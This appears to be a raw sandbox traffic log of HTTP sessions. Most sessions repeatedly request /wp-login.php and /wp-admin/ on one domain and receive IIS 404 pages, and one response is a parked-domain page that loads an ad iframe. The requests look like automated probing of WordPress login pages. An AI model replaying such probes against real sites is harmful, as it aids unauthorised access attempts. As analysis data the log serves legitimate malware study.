                                                                                                                                                                                                                                                                                                                Server: Apache/2
                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                157192.168.2.65753081.177.24.8480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.899604082 CET226OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.128098965 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.128110886 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.128516912 CET264OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://ershov.org/wp-login.php
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.355247974 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.355259895 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                158192.168.2.65756181.177.24.8480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.899626970 CET226OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.113286972 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.113297939 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.113961935 CET264OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://ershov.org/wp-login.php
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.326634884 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
